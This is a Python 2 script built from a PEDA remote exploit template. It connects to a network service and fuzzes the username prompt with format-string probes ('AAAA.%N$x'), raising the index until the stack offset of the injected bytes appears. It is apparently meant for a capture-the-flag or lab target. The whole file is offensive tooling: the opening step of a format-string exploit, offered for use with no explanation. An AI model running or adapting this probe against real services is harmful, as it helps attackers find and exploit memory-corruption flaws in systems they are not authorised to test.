Untitled

#!/usr/bin/env python
#
# Template for remote TCP exploit code, generated by PEDA
#
import os
import sys
import struct
import resource
import time
import re

def usage():
    print "Usage: %s host port" % sys.argv[0]
    return

from socket import *
import telnetlib
class TCPClient():
    def __init__(self, host, port, debug=0):
        self.debug = debug
        self.sock = socket(AF_INET, SOCK_STREAM)
        self.sock.connect((host, port))

    def debug_log(self, size, data, cmd):
        if self.debug != 0:
            print "%s(%d): %s" % (cmd, size, repr(data))

    def send(self, data, delay=0):
        if delay:
            time.sleep(delay)
        nsend = self.sock.send(data)
        if self.debug > 1:
            self.debug_log(nsend, data, "send")
        return nsend

    def sendline(self, data, delay=0):
        nsend = self.send(data + "\n", delay)
        return nsend

    def recv(self, size=1024, delay=0):
        if delay:
            time.sleep(delay)
        buf = self.sock.recv(size)
        if self.debug > 0:
            self.debug_log(len(buf), buf, "recv")
        return buf

    def recv_until(self, delim):
        buf = ""
        while True:
            c = self.sock.recv(1)
            buf += c
            if delim in buf:
                break
        self.debug_log(len(buf), buf, "recv")
        return buf

    def recvline(self):
        buf = self.recv_until("\n")
        return buf

    def close(self):
        self.sock.close()


def exploit(host, port):
    index = 0
    done = False
    try:
        # connect
        port = int(port)
        client = TCPClient(host, port, debug=0)
        print '[+] Fuzzer started'
        # max index of 1024
        while index != 1024:

            # recieve username banner and send a crafted formatstring response
            client.recv(1024)

            # increase index starting from 1
            index += 1
            fsr = "AAAA.%{0}$x".format(str(index))
            client.send(fsr + '\n')

            # recieve password banner and send a empty response
            client.recv(1024)
            client.send('\n')

            # recieve email banner and send a empty response
            client.recv(1024)
            client.send('\n')

            # recieve the result message and extract the formatstring response
            # from the username entry
            l = re.findall(r"'(.*?)'", client.recv(1024))

            # if the begin of the stack if found show the info
            if l[0].endswith('41414141'):
                print "[*] stack_index @ {0}".format(str(index))
                done = True

            # recieve the retry message and send 'yes' to continue or 'no' if done
            client.recv(1024)
            if not done:
                client.send('yes\n')
            else:
                client.send('no\n')
                client.close()
                break

        # some insurence
        client.close()

        print '[-] Fuzzer finished'

    except KeyboardInterrupt:
        pass

if __name__ == "__main__":
    if len(sys.argv) < 3:
        usage()
    else:
        exploit(sys.argv[1], sys.argv[2])